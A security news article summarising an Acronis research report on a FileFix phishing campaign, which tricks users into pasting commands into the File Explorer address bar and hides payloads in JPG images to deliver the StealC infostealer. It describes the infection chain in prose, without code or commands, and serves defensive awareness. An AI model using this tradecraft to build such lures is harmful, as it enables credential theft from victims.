FileFix: A New Attack Hides Malware in Plain Sight

Researchers from Acronis’ Threat Research Unit (TRU) have uncovered a rare in-the-wild FileFix campaign, marking the first time the attack has been observed outside proof-of-concept demonstrations. Building on the wave of ClickFix attacks, which surged by over 500% in recent months, FileFix represents an evolutionary leap in attacker tradecraft.

According to TRU, “This represents one of the most sophisticated Fix attack instances our team has observed to date.”

ClickFix-style attacks exploit social engineering to trick victims into pasting malicious commands into their terminals or Run dialogs, often disguised as CAPTCHA checks. FileFix introduces a twist: instead of targeting the terminal, it abuses the file upload dialog.

The report explains, “A FileFix attack… will leverage the file upload functionality in HTML to create an upload button… In a FileFix attack, the user is tricked into pasting a malicious command into the File Explorer address bar, which will then run the command locally on the user’s machine.”

This subtle shift makes the attack more convincing—many users rarely interact with a terminal, but almost everyone has used a file upload window.

The campaign’s phishing infrastructure stood out for its detail and reach. TRU noted: “The observed campaign uses a highly convincing, multilingual phishing site (e.g., fake Facebook Security page), with anti-analysis techniques and advanced obfuscation to evade detection.”

The phishing pages featured translations into 16 languages, maximizing global reach, and were backed by minified, obfuscated JavaScript—shrinking over 18,000 lines of code into just 12 to frustrate analysts.

One of the most striking aspects of the FileFix campaign is its use of steganography. TRU writes, “The attack uniquely employs steganography by embedding both a second-stage PowerShell script and encrypted, executable payloads within seemingly harmless JPG images.”

Victims are tricked into pasting what looks like a file path, but behind the scenes, the payload downloads an image from a trusted platform like Bitbucket. The JPG isn’t just a picture—it hides both scripts and executables, which are extracted and executed silently.

The infection chain relies on layered obfuscation:

1. First-stage PowerShell script – fragmented, Base64-encoded, with fake variables masking its true purpose.
2. Second-stage script – extracted from the JPG, using RC4 decryption and gzip decompression to retrieve malicious DLLs or EXEs.
3. Final payload – a Go-based loader with sandbox checks and string encryption, which executes StealC infostealer.

StealC is capable of harvesting browser credentials, cryptocurrency wallets, messaging app data, and cloud access keys, while also functioning as a loader for additional malware.

The TRU team observed multiple variants of the attack evolving within just two weeks. Early versions used simple PowerShell payloads, while later iterations introduced multi-stage scripts, XOR-encrypted URLs, and AI-generated images.

“A growing rate of detections related to the campaign indicates the attack may be accelerating,” the report warns.

VirusTotal submissions linked to the campaign span countries including the U.S., Bangladesh, Philippines, Tunisia, Nepal, Dominican Republic, Germany, and China, underscoring its global ambitions.

FileFix demonstrates how attackers are rapidly weaponizing proof-of-concept techniques into real-world campaigns, pushing beyond ClickFix to create more persuasive, harder-to-detect attacks. With steganography, multilingual phishing, and multi-stage payload delivery, this campaign sets a new bar for *Fix-style social engineering threats.

Related Posts:

• JavaScript-Based Malware Exploits Steganography for Covert Data Theft
• Acronis TRU Uncovers Surge in ScreenConnect Abuse with Dual-RAT Deployment
• SocGholish Campaign Targets Business Networks via Fake Browser Updates
• DCRat: Sophisticated RAT Delivered via Phishing Campaign Impersonating Government Entity
• Beware the Invisible Threat: Phishing Expands with QR Codes, CAPTCHAs, and Steganography